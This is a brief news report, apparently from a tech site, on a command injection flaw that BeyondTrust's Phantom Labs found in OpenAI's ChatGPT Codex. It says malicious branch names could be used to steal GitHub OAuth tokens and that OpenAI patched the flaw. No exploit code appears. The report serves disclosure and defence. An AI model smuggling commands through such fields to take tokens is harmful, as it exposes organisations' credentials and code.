‘Not just development tools’: Security experts discover critical flaw in OpenAI’s Codex which could compromise entire enterprise organizations



  • BeyondTrust Phantom Labs finds critical command injection flaw in OpenAI’s ChatGPT Codex
  • Vulnerability let attackers steal GitHub OAuth tokens via malicious branch names
  • OpenAI patched with stronger input validation, shell escaping, and token controls

Experts have claimed OpenAI’s ChatGPT Codex carried a critical command injection vulnerability which allowed threat actors to steal sensitive GitHub authentication tokens.

This is according to BeyondTrust’s research department, Phantom Labs, whose work helped OpenAI identify and patch the flaw.


https://cdn.mos.cms.futurecdn.net/pNvZnS4EQCoYBG2inqCq5L-970-80.jpg



Source link

Latest articles

spot_imgspot_img

Related articles

Leave a reply

Please enter your comment!
Please enter your name here

spot_imgspot_img